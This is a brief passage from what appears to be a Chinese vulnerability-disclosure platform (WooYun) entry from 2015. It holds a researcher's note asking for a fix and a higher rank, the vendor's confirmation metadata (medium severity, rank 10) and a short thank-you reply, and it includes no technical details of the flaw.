如上昨天提交的
http://www.wooyun.org/bugs/wooyun-2015-0160269/trace/b03134ca0952158157208aef0185ff81
未通过 ,但是漏洞并未修复,请修复后公开
认真对待 漏洞打包提交,20rank不过分吧 谢谢
危害等级:中
漏洞Rank:10
确认时间:2015-12-11 17:39
三发大礼包收下了,谢谢!
暂无